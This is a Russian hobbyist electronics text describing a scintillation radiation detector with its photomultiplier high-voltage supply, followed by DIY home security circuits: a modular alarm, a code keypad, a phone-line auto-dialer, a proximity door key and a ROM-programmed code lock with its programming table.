Сцинтилляционные детекторы ионизирующего излучения
Для обнаружения ионизирующего излучения нередко используют способность некоторых веществ - сцинтилляторов - делать видимой, светящейся траекторию «простреливающей» их ионизирующей частицы.
Сцинтилляционные детекторы ионизирующих излучений имеют определенное преимущество перед счетчиками Гейгера - по амплитуде и длительности вспышки можно судить о типе и энергии породившей ее частицы. Важно и то, что сцинтилляционный счетчик имеет значительно большую эффективность, нежели счетчик Гейгера, фиксирующий обычно лишь одну-две частицы из ста в него попавших.
Конструктивно сцинтилляционный счетчик прост: нужный сцинтиллятор (см. приложение 7) наклеивают на катод фотоэлектронного умножителя (ФЭУ) и все это помещают в тщательно изолированный от посторонней подсветки бокс. Остальное - подсчет фотоимпульсов, сортировка их по амплитуде, форме и т.п. - дело обычной электронной техники.
Принципиальная схема фотоголовки сцинтилляционного счетчика приведена на рис. 81, а высоковольтного преобразователя для ее питания - на рис. 82. Напряжение питания ФЭУ - высокое по отношению к «земле» - подают обычно на его катод. Это позволяет связать анодную цепь ФЭУ с электронным анализатором прибора гальванически, учитывать при необходимости и постоянную составляющую его фототока.
Напряжение питания ФЭУ, его распределение между динодами и, соответственно, соотношения номиналов резисторов R2...R13, составляющих динодный делитель, зависят от типа фотоумножителя (см. приложение 6). Здесь мы воспользовались относительно
Рис. 81. Фотоголовка сцинтилляционного детектора ионизирующей радиации
низковольтным ФЭУ-85. Поскольку режим работы ФЭУ в сцинтилляторах бытового назначения близок к «темновому», сопротивления динодных резисторов могут быть и значительно выше рекомендованных (при сохранении пропорций).
Единственная оперативная регулировка в канале - резистор R14 - выполняет очень важную функцию: на компараторе DA1 им задают пороговое напряжение U3-4. Лишь импульсы, имеющие амплитуду Uимп>U3-4, откроют компаратор и на его выходе (выв. 9) будет сформирован импульс цифрового стандарта.
В автономной, дозиметрической аппаратуре, использующей ФЭУ, возникает проблема их питания. Необходимое ФЭУ высокое напряжение Uфэу (0,8...1 кВ и более), требования к его стабильности (фоточувствительность ФЭУ довольно сильно зависит от напряжения питания; см. приложение 7) предъявляют к устройствам, формирующим это напряжение, довольно жесткие требования.
Рис. 82. Преобразователь для питания ФЭУ
Основу высоковольтного преобразователя, показанного на рис. 82, составляет блокинг-генератор, формирующий на обмотке II трансформатора Т1 импульсы напряжения с амплитудой Uимп@Uфэу. Через диодный столб VD3 они заряжают конденсатор С5, который становится таким образом источником питания фотоумножителя. Пульсации Uфэу (они имею форму «пилы» с временными интервалами между «зубцами» tп@R7·C4) снимает RC-фильтр (С5, R8, С6, R9, С7).
В цепь питания блокинг-генератора введен транзистор VT2, коллекторный ток которого зависит от тока базы, зависящего, в свою очередь, от тока стока полевого транзистора VT3 . Напряжение на затворе этого транзистора зависит от Uфэу, напряжения на стабилитроне VD1 (транзистор VT1 - его токозадающий «резистор») и соотношения «плечей» делителя R3+R4, R6 (резистором R3 выставляют нужное Uфэу ). Легко видеть, что при понижении Uфэу (по абсолютной величине), возникшем по какой-либо дестабилизирующей причине, напряжение питания блокинг-генератора увеличится и воздействие дестабилизирующего фактора будет тем самым в значительной мере компенсировано.
Трансформатор блокинг-генератора наматывают на ферритовом кольце М3000МН 20х12х6 мм. В связи с тем, что этот феррит имеет низкое объемное сопротивление, острые ребра сердечника необходимо загладить и тщательно весь его изолировать; обмотать, например, лавсановой или фторопластовой лентой.
Первой наматывают обмотку II, содержащую 800 витков провода ПЭВ-2 0,07. Намотку ведут в одну сторону, почти виток к витку, оставляя между началом и концом обмотки промежуток 2...3 мм. Обмотку II также покрывают слоем изоляции. Обмотку I (8 витков ПЭВШО 0,15...0,25) и обмотку III (3 витка тем же проводом) укладывают по сердечнику возможно равномернее.
Фазировка обмоток (точками на Т1 отмечены их синфазные концы) должна быть соблюдена при монтаже трансформатора.
О деталях преобразователя. Резистор R6 - КИМ-0,125, R3 - СП-38А, другие - МЛТ-0,125 и 0,25. Конденсаторы СЗ, С4 - КМ-6 или К10-176; С5 ,С7 - К15-5-Н70 (1,5 кВ) или другие керамические на напряжение не менее 1 кВ; С1 и С2 - любые оксидные. Диодный столб 2Ц111А-1 можно заменить четырьмя последовательно включенными диодами типа КД102А. При каких-либо иных заменах нужно иметь в виду, что диодный столб VD3 не только должен иметь высокое обратное напряжение - не менее Uфэу , но и малый (при этом напряжении) ток утечки - не более 0,1 мкА.
Транзистор блокинг-генератора можно заменить на КТ630В. Здесь определяющим параметром является напряжение насыщения транзистора в импульсном режиме: при токе в импульсе 1...1,5 А - Uкэ нас имп Ј0,3 В. Остаточное напряжение на коллекторе транзистора нетрудно оценить по осциллограмме: по «зазору» между плоской вершиной импульса и линией нулевого потенциала.
Ток, потребляемый высоковольтным преобразователем от источника питания, будет зависеть, конечно, от нагрузки. С двумя описанными здесь сцинтилляционными головками, работавшими в режиме радиационного локатора, он не превышал 16 мА.
Охранные устройства и средства безопасности
Многофункциональная система охраны
Схема охраны построена по модульному принципу (рис. 2.1), что дает возможность легко собрать систему охраны, наиболее удобную для конкретных целей — от охраны квартиры, дачи до автомобиля. При этом, собирая и подключая к базовому блоку дополнительные модули, можно легко расширять функциональные возможности системы охраны, например ввести автоматическое оповещение по телефонной линии соседей или родственников, а также ряд других полезных функций.
Рис. 2.1. Структурная схема модульной системы охраны
При разработке не применялись дорогие или дефицитные детали, что делает схемы легко доступными для повторения всеми желающими, а использование модульного принципа построения упростило отдельные узлы системы.
Все схемы собраны на широко распространенных «МОП микросхемах, что обеспечивает минимальное потребление тока, работу в широком диапазоне питающих напряжений (4...15 В) и высокую надежность. Временные интервалы,
необходимые для работы системы, получены без использования электролитических конденсаторов, что также повышает надежность и расширяет диапазон рабочих температур.
Базовый блок охраны
В простейшем варианте для работы охранной сигнализации достаточно подключить блок временных интервалов (A3) к источнику питания (А1), а также установить датчики F1...F4 и кнопки управления SB1 — включение, SB2 — выключение охраны (рис. 2.2). Такое подключение в тексте называется "базовый блок".
Рис. 2.2. Базовый блок охранной сигнализации
Технические характеристики базового блока охраны:
В зависимости от назначения системы схема блока питания (А1) выбирается из вариантов, показанных на рис 2.3
В качестве охранных датчиков могут применяться герконовые контакты совместно : магнитом или кнопки (первое надежнее, так как они герметичны и не боятся атмосферных воздействий).
Для звукового сигнала тревоги (НА1) может использоваться автомобильная сирена или аналогичная пищалка. Ее включение производится одной из групп контактов реле ЗК1 (A3), что позволяет коммутировать любую нагрузку, в том числе сетевого звонка (до трех разных устройств одновременно). Если же блок охраны имеет только автономное питание, то вместо реле ЗК1 можно подключить сразу звуковую сирену.
Рассмотрим более подробно работу модулей системы охраны
Источник питания А1 в особых пояснениях не нуждается, так как собран по типовой схеме Коммутация напряжения питания осуществляется контактами поляризованного реле К1 (А1), рис 23, которое выполняет роль триггера. Особенностью такого реле является способность поддерживать переключающие контакты в нужном положении при отсутствии напряжения на обмотке — достаточно кратковременной подачи напряжения на соответствующую обмотку, чтобы переключить группу контактов. В качестве резервного источника питания G1 могут применяться 10 аккумуляторов типа НКГЦ-0,5 или более мощные. Если G1 не устанавливается, то цепь контроля напряжения соединяется с "+" питания (на рис. 2.За перемычка вместо диода VD5)
Рис. 2.3. а) Питание схемы в стационарных условиях,
б) питание схемы в автомобиле
Рис. 2.4. Электрическая схема блоков системы охраны
Для питания всех узлов схемы можно использовать и меньшее напряжение, если применять все исполнительные реле с обмоткой на соответствующее рабочее напряжение.
Блок временных интервалов A3, рис. 2.4, состоит из триггера на элементах D1.1. D1.3; генератора импульсов D3 1, D3.2; счетчика импульсов D5 селектора временных интервалов (12 и 6 с) на логических элементах микросхем D6, D3 4, D7; ограничителя времени звучания звукового сигнала на счетчике D2; триггера на элементах D4 для обеспечения режима ожидания начала отсчета первого временного интервала (12 с).
В момент подачи питания на схему импульс, сформированный цепью C3-R3, обеспечивает начальную нулевую установку счетчиков D2 и D5 (на выходе D2/7 появится лог. "1", т. е. напряжение питания). При этом на выводах микросхем будут состояния: D4/3 — "1"; D5/11 — "1"; D1/1 — "1"; D1/2 — "1" D1/3 — "0"; D6/10 — "1"; D7/9 — "0".
После срабатывания датчика F1 (лог. "0" на входах D4/13 и D1/9) на выходе D4/11 появится лог. "1" (на D4/10 — лог. "0", что разрешает работу счетчика D5). При этом работает генератор (импульсы на D3/3 с частотой примерно 500 Гц) и связанный с ним счетчик D5, до момента времени (12 с), пока на D6/10 не появится лог. "0" (на D1/3 лог. "1" — что остановит работу генератора). Схема переходит в режим ОХРАНА. Если при этом сработает датчик F1 — переключится триггер на элементах D1 1 .D1.3 (на выводе D1/4 появится лог. "1", на D1/3 — "0"), что разрешает работу генератора и счетчика D5. В этом случае если не нажать кнопку SB2, через 6 с появится звуковой сигнал тревоги.
При срабатывании любого другого датчика триггер на элементах D1.1...D1.3 также переключится, но звуковой сигнал тревоги появится без задержки и будет прерывистым, так как лог. "О" подается на вход D3/12, а на D3/11 будут импульсы.
Счетчик D2 позволяет ограничить время работы звукового оповещения. Когда на D2/7 появится лог. "О" (при включенном SA1), а на D4/10 - лог. "1" — этот уровень дает запрет на работу D5 и прохождение сигналов на выход D7/9.
Контроль за напряжением аккумулятора выполняет транзистор VT3. Он работает в режиме микротоков, за счет чего имеет большое усиление и переключается из запертого состояния в открытое при изменении напряжения в цепи контроля на 0,1 В. Подбором резистора R11 нужно добиться, чтобы при
напряжении источника G1 9 В и меньше транзистор VT3 запирался (лог "1" на входе D4/6). Зеленый светодиод будет непрерывно светиться — что говорит о необходимости устранить причину снижения напряжения. Светодиод отключится при переходе схемы в режим ОХРАНА (D4/5 — лог "0") — это исключает разряд элементов питания за счет тока, протекающего через светодиод. Сдвоенный
светодиод HL1 можно заменить двумя любыми обычными, но с разным цветом свечения. Зеленый светодиод служит также для индикации режимов работы моргает). Пои этом для того чтобы снизить ток потребления схемой, напряжение на него подается короткими импульсами с выхода D7/10. Из-за инерции зрения это незаметно.
Топология печатной платы для схемы не разрабатывалась, и монтаж радиоэлементов несложно выполнить на универсальных макетных платах с контактными площадками под установку микросхем При монтаже следует учитывать, что, пока микросхемы не распаяны в схему, они боятся статического электричества.
В схеме применены неполярные конденсаторы — К10-17, электролитические типа К52-1Б или аналогичные с малыми токами утечки Резисторы подойдут любые. Диодную матрицу КДС627А можно заменить обычными импульсными диодами. Вместо сдвоенного светодиода HL1 подойдут два одинарных из серии КИПД24 (разных цветов) Микросхемы серии 561 заменяются на аналогичные из серии 564 Для соединения модулей между собой (при использовании системы для охраны помещения) удобно применять разъемы типа МРН14-1 или аналогичные. Реле ЗК1 типа РЭС48, паспорт РС4.520.202
(РС4.520 214), но подойдут и многие другие Поляризованные реле К1 блока питания типа РЭС32Б РС4 520.204, РС4 520.212 или РС4.520 220.
Соединения от датчиков F1.. F4 до схемы выполняются перевитыми между собой проводами. Кнопка SB2 устанавливается скрытно в любом удобном месте. Звуковой индикатор HF1 и светодиод HL1 желательно вынести из корпуса, что отвлечет внимание от места расположения основной конструкции в случае проникновения вора.
Налаживание блока временных интервалов начинается с установки резистором R12 порога запирания транзистора VT3 при напряжении 9 В в цепи аккумулятора (напряжение подается от регулируемого источника питания). После этого проверяется логика работы схемы в соответствии с описанием. При необходимости можно подстроить частоту тактового генератора резистором R9 для получения временных интервалов 6 и 12 с (или 8 и 16с).
Сканер датчиков
Применение сканера (А2) обеспечивает автоматическое запоминание состояния датчиков в момент включения блока охраны как исходного. При этом датчики F2, F4 могут быть в произвольной комбинации замкнуты или разомкнуты — сигнализация сработает от изменения состояния, а при долговременном нарушении одного из четырех шлейфов охраны, через 3,5 мин работы сирены, сканер переключит цепь охраны на инверсный сигнал, т. е. если раньше данный шлейф срабатывал на размыкание, то теперь будет реагировать на изменение состояния (замыкание). Такое переключение при необходимости схема выполняет до трех раз, когда появляется импульс на выходе D2/14 счетчика.
Сканер охранных датчиков А2, рис. 2 4, собран на двух микросхемах. Четырехразрядный последовательно-параллельный регистр 2D1 используется для запоминания исходного состояния охранных датчиков. Запись в регистр производится при появлении импульса на входе 2D1/6 — первоначально это происходит при срабатывании датчика F1 (триггер на D4.2, D4.3 переключится). Управление регистром 2D1 выбрано так, что на его выходах сигнал является инверсным по отношению к входным (в начальном состоянии на выводах 13,15, 14 и 1 будет лог "1") Логические элементы 2D2 обеспечивают на выходах лог "1", что эквивалентно подключению к разъему ХЗ нормально разомкнутых датчиков как это показано на рис. 2.2.
В качестве датчиков, устанавливаемых на дверях, окнах и других местах могут применяться как обычные, промышленного изготовления (СМК-1, ДИМК) на размыкание, так и любые другие (ультразвуковые, емкостные, инфракрасные и т. д.), имеющие релейный выход при срабатывании. К одному охранному шлейфу может подключаться много датчиков, замкнутых в кольцо так, чтобы при размыкании любого из них разрывалась цепь.
Подключение удаленного датчика
Если же необходимо подключить удаленный датчик и провода невозможно скрыть, то шлейф охраны должен срабатывать при любом нарушении цепи (разрыве или замыкании).
Рис. 2. 5. Электрическая схема для подключения удаленного датчика
Традиционное построение такой схемы связано с включением датчика последовательно с резистором в плечо моста. При разбалансе моста формируется сигнал срабатывания В этом случае по цепи хранного шлейфа должен протекать ток более 5 мА, что не экономично, так как требуется мощный источник автономного питания Аналогичную задачу, но работая в импульсном режиме, выполняет схема на рис. 2.5 — она потребляет не более 1,5 мА.
Рис. 2. 6. Топология печатной платы и расположение на ней элементов
Короткие импульсы вырабатывает автогенератор на транзисторе VT3. Балансируется мост, образованный из элементов R1-C1-C2-R2-R5-R6 подстроечным резистором R2 под конкретную линию охранного шлейфа при первоначальном подключении.
Топология печатной платы для схемы удаленного датчика приведена на рис. 2.6.
Кодовый кнопочный выключатель
Выключение режима охраны (вместо кнопки SB2) можно выполнять набором кодового цифрового номера на кнопочной панели. Это затруднит отключение охраны. Код состоит из 4 цифр (из 10 возможных) Кнопки с определенными. Цифрами необходимо нажать в заданной последовательности. Это позволяет иметь не менее 5040 возможных вариантов кода.
Код можно легко и оперативно сменить, переставив зажимы проводов от кнопок в любой последовательности. Схема кодового устройства, рис. 2.7, собрана на одной микросхеме, содержащей четыре RS-триггера. Работает элекрическая схема следующим образом в начальный момент, при подаче питания, цепь из конденсатора С1 и резистора R6 формирует на входах R импульс обнуления триггеров.
При нажатии на кнопку с первой цифрой кода (на схеме SB7) триггер переключится, т е. на выходе D1/2 появится лог "1". Если при нажатии очередной кнопки на выходе соответствующего триггера имеется лог. "1", т е предыдущий сработал, то лог. "1" появится и на его выходе.
Рис 2 7 Кодовый кнопочный выключатель
Последний сработавший триггер открывает транзистор VT3, что подает напряжение для переключения поляризованного реле в блоке А1. Чтобы схема осталась в таком состоянии надолго, используется транзистор VT2. Он обеспечивает через задержку обнуления всех триггеров. Задержка выполнена засчет цепи заряда конденсатора СЗ через резистор R10. По этой причине на выходе D1/1 сигнал лог "1" будет присутствовать не более 1 с. Этого времени вполне - достаточно для срабатывания реле. Кроме того, использование для транзистора VT2 сигнала с выхода D1/10 позволяет ограничить необходимое время для нажатия последней кнопки кода.
Индикатором правильного набора номера является кратковременное свечение светодиода HL1. В процессе набора кода нажатие любой ошибочной цифры обнуляет все триггеры, и набор придется повторить сначала.
Так как для микросхемы режим, когда на R и S входах одновременно присутствует лог "1", является запрещенным, транзистор VT1 исключает такую возможность даже при нажатии сразу двух кнопок
Для уменьшения влияния помех и наводок схема размещается вблизи кнопочной панели.
Все используемые детали, за исключением транзистора VT3, могут быть любого типа. Транзистор VT3 применен с большим коэффициентом усиления и заменяется на КТ829А. Резисторы могут иметь отклонение номинала на 20% от указанных на схеме. Конденсатор С1 типа КМ-6, С2, СЗ — К52-1Б.
Оповещение по телефонной линии
Блок А4 позволяет оповестить о срабатывании сигнализации одного из абонентов телефонной линии При этом квартира включается на прослушивание, если взяли трубку на другом конце. Электрическая схема, рис. 2.8, предназначена для работы совместно с базовым блоком охраны (соединяется через разъем Х5) и подключается к телефонной линии (ТЛ) параллельно с телефонным аппаратом в любом месте.
Устройство собрано на четырех микросхемах и обеспечивает автоматический набор номера нужного абонента в случае появления сигнала тревоги (лог. "1" на входе D1/3) При этом все основные управляющие сигналы снимаются с блока временных интервалов A3, что упростило схему.
Для узла набора номера применяется широко распространенная специализированная микросхема КР1008ВЖ1 (D4) и кнопочная панель "КК" от телефона-трубки. Работа этой микросхемы подробно описана в литературе [Л9]. Установка нужного номера осуществляется (при нахождении тумблера SA1 в положении ВКЛ) аналогично, как и в любом кнопочном ТА. Последний набранный номер хранится в регистрах памяти микросхемы (при наличии питания на выводе D4/3 — использование резервного автономного источника в этом случае является необходимым).
Для проверки правильности набора номера достаточно снять трубку с телефона и убедиться в соединении с нужным абонентом. Если номер телефона набран ранее и хранится в памяти этой микросхемы, то можно проверить правильность его набора последовательным нажатием на клавиши "#" (сброс) и "*" (повтор). При автоматическом дозвоне эту же комбинацию соединений выполняют электронные ключи на элементах D2 1 и D2.3 (вместо нажатия "#" достаточно прервать питание на выводе D4/6) Ключами управляют триггер D1 1 и счетчик D3, срабатывая от тактовых импульсов, приходящих на вход D3/14. Как только счетчик D3 досчитает до появления на его выходе D3/10 лог. "1", на D1/12 также появится лог. "1", что остановит работу D3.
Импульсы кодового набора номера, приходящие с выхода микросхемы D4/12 через замкнутый ключ D2.2, поступают на управление транзистором VT1.
Рис. 2.8. Блок оповещения по телефонной линии
Коммутацию ТЛ при наборе номера выполняют контакты герконового реле 4К1 1, что обеспечивает полную электрическую развязку цепей охраны от ТЛ.
Схема микрофонного усилителя, рис 2 9, на транзисторах VT2 VT4 питается от телефонной линии и будет подключена (контактами реле 4К1) до момента времени, пока на входах D1/4 и D3/15 не появится лог "1".
Рис. 2. 9. Схема микрофонного уснлителя
Рис. 2. 10. Схема замены реле 4К1 на оптоэчектронный ключ
Индикатором подключения ТЛ к блоку охраны (в режиме оповещения) является свечение светодиода HL1.
Ограничить время работы ТЛ с блоком охраны до 5 мин позволяет цепь из R7-C2. Как только в процессе заряда на конденсаторе С2 напряжение достиг нет порога срабатывания (открывания) ключа D2 4, лог. "1" будет подана на входы начальной установки (R) триггера и счетчика. Схема вернется в исходное
состояние, когда на D1/1 будет лог. "0".
Резисторы R1 R3 предохраняют входы микросхемы от повреждения статическим электричеством на время, пока блок не подключен к системе.
Схема, так же как и базовый блок, не критична к выбору используемых элементов и точности номиналов. Подстроечный резистор R11 типа СПЗ-19а, переключатель SA1 типа ПД9-2.
При правильной сборке настройка заключается в установке с кнопочной панели "КК" необходимого номера оповещения (при включенном SA1) и подборе оптимальной частоты набора номера резистором R11 (потребуется несколько раз убедиться в правильности набора номера).
Схема в дежурном режиме по цепи 12 В потребляет ток не более 31 мкА, а при наборе номера и оповещении по телефону не более 40 мА.
Ток потребления схемой в режиме оповещения можно значительно снизить (до 3 6 мА), если вместо герконового реле 4К1 типа РЭС55А паспорт РС4 569.602 использовать оптоэлектронный ключ, рис. 2.10. Коммутатор КР293КП1В заменяется аналогичным КР293КП4В, но при этом изменится нуме-
рация выводов.
Бесконтактный ключ
В отличие от обычного механического ключа или электронного (магнитной карточки), этот не потребуется доставать и вставлять в замок. При приближении к двери на 0,5 м человека, имеющего с собой данное устройство, — дверной замок с электроприводом (электромагнитом) автоматически откроется.
Сам ключ имеет габариты чуть больше спичечной коробки (70х54х17 мм) и легко размещается в любом кармане.
Рис. 2.11 Схема передатчика
В простейшем варианте система состоит из миниатюрного передатчика (ключа) и настроенного на его частоту приемника, а также исполнительного устройства с источником питания.
Устройство может найти и другие применения, например выключение охраны. Не зная места расположения приемника, таким ключом невозможно воспользоваться.
Схема передатчика, рис 211, собрана на одном транзисторе, работающем в режиме микротоков. Индуктивность L1 и конденсаторы С2, СЗ обеспечивают работу автогенератора на частоте около 200 кГц. Для питания взяты четыре аккумуляторных таблетки типа Д-0,115. Потребляемый передатчиком ток не превышает 1,6 мА, и одной зарядки аккумуляторов хватает для непрерывной работы схемы в течение трех суток
Pис. 2.12. Зарядное устройство
Рис. 2.13. Приемник
В качестве зарядного устройства может использоваться простейшая схема с бестрансформаторным питанием от сети 220 В, рис 212В этом случае не потребуется вскрывать корпус ключа — соединение с зарядным устройством выполняется через миниатюрный разъем Х1. Светодиод HL1 устанавливается
на корпусе зарядного устройства и служит индикатором наличия напряжения, а стабилитрон VD2 ограничивает напряжение на выходе. Для полного заряда аккумуляторов может потребоваться 4...10 часов.
Схема приемника показана на рис. 2. 13. Наведенный в катушке L1 сигнал усиливают транзисторы VT1 VT3. Детектирование сигнала выполняет транзистор VT4 (активный детектор) На VT5 и VT6 (в диодном включении) обеспечивается стабилизация рабочей точки каскадов усиления. Два резонансных контура (L1-C1-C2 и L2-C8) настраиваются на частоту передатчика с помощью ферритовых сердечников. Этим обеспечивается узкополосное усиление приемника и срабатывание (появление нулевого напряжения на коллекторе транзистора VT7) только от передатчика с определенной частотой.
Вариант схемы источника питания и исполнительного устройства с включением электромагнита YA1 показан на рис. 2.14. Конденсатор С1 обеспечивает задержку срабатывания транзистора VT2 при наличии случайных помех на выходе приемника.
Рис. 2.14. Исполнительное устройство
Рис. 2. 15. Топология печатной платы передатчика
Особенности конструкции. Постоянные резисторы могут быть любого типа, электролитические полярные конденсаторы применены типа К50-16, остальные конденсаторы — типа К10-17 (КМ-4).
Рис. 2.16. Топотогия печатной платы и расположение элементов приемника
Монтаж схем устройств выполнен на стеклотекстолите толщиной 1,5 мм. Топология печатной платы для передатчика и приемника приведены на рис. 2.15 и 2.16.
В передатчике монтаж радиоэлементов расположен со стороны печатных проводников. Элементы питания прижимаются к плате пластиной фольгированного стеклотекстолита (она не показана). Микропереключатель S1 типа ПД9-2 можно заменить кнопкой, которую придется нажимать при приближении к приемнику
Для изготовления катушек L1 (приемника и передатчика) взят ферритовый стержень марки 400НН (или 600НН) диаметром 8 мм от любой магнитной антенны бытового приемника (для настройки обычно достаточно кусочка длиной 20...30 мм). Катушки наматываются проводом ПЭЛШО диаметром 0,06 (0,08) мм и содержат 300 витков — у приемника, и 200 витков — у передатчика (на бумажном каркасе длиной 45 мм). После намотки витки фиксируются клеем типа "Момент". Для изготовления в приемнике катушки L2 взят каркас и ферритовые чашки от контуров промежуточной частоты миниатюрных радиоприемников, рис. 2.17. Обмотка содержит 1 — 160 витков, 2 — 200 витков проводом ПЭВ-2
диаметром 0,08 мм. Обмотки желательно выполнять в отсеках раздельно, при этом в верхней секции наматывается обмотка 1.
Рис. 2.17. Конструкция катушки L2 приемника
При установке приемника лучше располагать его на уровне положения ключа, кроме того, для получения максимальной дальности обнаружения, имеет значение расположение катушки передатчика и приемника — у них должны совпадать диаграммы направленности, что происходит в случае аналогичного расположения: горизонтально или перпендикулярно относительно земли.
В заключение можно отметить, что для повышения секретности ключа несложно ввести модуляцию частоты автогенератора кодовой посылкой или более низкой частотой (импульсная модуляция), что незначительно усложнит схему, но затруднит подделку ключа для человека, знакомого с принципом работы даной системы. Модуляция передатчика также увеличит время непрерывной работы передатчика без подзаряда аккумуляторов. В качестве модулятора удобно применить схему генератора, показанную на рис. 1.40. В приемнике в этом случае после детектора устанавливается простейший фильтр, настроенный на частоту модуляции.
Многофункциональный кодовый замок
Иногда, для ограничения доступа посторонних, бывает удобно иметь кнопочный кодовый замок. Кодовый замок с числовым кодом, состоящим из 5 знаков (из 11 возможных), легко выполнить всего на одной программируемой микросхеме из серии РФ. Особенностью данной схемы (рис. 2.18) является использование цепей обратной связи (диоды VD2...VD5) с выхода микросхемы на ее вход, что позволяет при соответствующем программировании ПЗУ получить триггерный эффект (запоминание комбинации при правильном наборе номера).
В исходном состоянии на выходах 1...4 присутствует лог. "1", а на остальных выходах лог. "0". Микросхема программируется в соответствии с таблицей 2.1 (не показанные адреса программируются аналогично первой строчке таблицы).
Pис. 2.18. Электрическая схема
Связь двоичного кода с принятой 16 значнои системой обозначении приведена в таблице 2.2.
Программа работы микросхемы (см строку с адресом 7FO в таблице 2.1) составлена так что при последовательном нажатии кнопок подключенных к входам 1...4 (выводы 8...5), — на соответствующих выходах (выводы 9, 11,13) появляется лог. "0", что через диоды VD2...VD5 передается на вход. Это фиксирует нулевое состояние соответствующего входного сигнала уже после отпускания кнопки.
Для того чтобы получить управляющий сигнал на включение электромагнита необходимо нажать кнопки пятизначного кода в заданной последовательности — иначе потребуется повторять набор сначала. Нажатие любой ошибочной цифры переводит все выходы микросхемы в исходное состояние.
Таблица 2.1.
0 |
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
A |
В |
С |
D |
E |
F |
|
000 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
3FO |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
8F |
400 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
5FO |
OF |
41 |
OF |
OF |
OF |
OF |
OF |
OF |
48 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
600 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
6FO |
OF |
41 |
OF |
OF |
OF |
OF |
OF |
OF |
48 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
700 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
710 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
720 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
730 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
740 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
750 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
760 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
770 |
10 |
41 |
OF |
OF |
OF |
OF |
OF |
OF |
48 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
780 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
790 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
7АО |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
7ВО |
20 |
41 |
OF |
OF |
OF |
OF |
OF |
OF |
48 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
7СО |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
7DO |
OF |
41 |
OF |
OF |
OF |
OF |
OF |
OF |
48 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
7ЕО |
OF |
41 |
OF |
OF |
OF |
OF |
OF |
OF |
48 |
OF |
OF |
OF |
OF |
OF |
OF |
OF |
7FO |
00 |
01 |
OF |
OF |
OF |
05 |
OF |
07 |
08 |
OF |
OF |
OF |
ОС |
OF |
OE |
OF |
Таблица 2.2.
0000 |
0 |
0001 |
1 |
0010 |
2 |
0011 |
3 |
0100 |
4 |
0101 |
5 |
0110 |
6 |
0111 |
7 |
1000 |
8 |
1001 |
9 |
1010 |
А |
1011 |
В |
1100 |
С |
1101 |
D |
1110 |
E |
1111 |
F |
Индикатором правильного набора кода служит свечение светодиода HL1. Включение электромагнита выполняет транзистор VT2. Нажатие на кнопку включает звонок а также сбрасывает ранее набранный код (переводит микросхему D1 в исходное состояние).
Использование программируемой микросхемы позволяет легко получить несколько дополнительных полезных функции Так, например, при попытке подобрать код— на выводе D1/16 появится сигнал тревоги (лог 1), что приведет к срабатыванию реле К1. Контакты К1 1 включаются в цепь шлейфа охранной сигнализации. Попыткой подбора кода считатся если первые три цифры набраны правильно, а в четвертой — ошибка.
Pис. 2.19 Эмутятор ПЗУ
Переключатель SA1 дает возможность быстро сменить код, не переставляя последовательность подключения кнопок ко входам микросхемы. Последовательность набора номера для положения переключателя SA1 "КОД 1" 1-2-3-4-8, а при положении "КОД 2" 4-2-3-1-7. При этом ко входам микросхемы могут подключаться кнопки с любыми номерами — важна только последовательность их нажатия относительно выводов микросхемы.
Приведенная схема несмотря на свою простоту, имеет большие возможности для модификации под конкретную задачу. Так например, набираемый код может состоять из двухзначных цифр — при этом потребуется, не меняя схемы, откорректировать таблицу программирования. По этой причине микросхему лучше устанавливать на контактной панельке.
Топология печатной платы не разрабатывалась а монтаж несложно выполнить на универсальной макетной плате. Для исключения наводок по соединительным с кнопками проводам устройство размещается вблизи кнопочной панели (30 50 см). При наличии наводок или при работе схемы в условиях большого уровня помех на входах микросхемы D1 можно установить конденсаторы
0,1 мкФ соединенные с общим проводом.
Схема не критична к типам используемых резисторов и конденсаторов. Резисторы R5 R16 могут иметь номинал 1... 8,2 кОм. Конденсаторы С1...С2 типа К50-35 на 25 В. Микросхема D1 заменяется на 573РФ2 или импортный аналог 2716. Программируемую микросхему можно использовать и других типов например КР556РТ6, КР556РТ7, но в этом случае может потребоваться внести изменение в схему соединении. Для удобства подключения кнопочной панели применен разъем Х1 типа МРН-14-1.
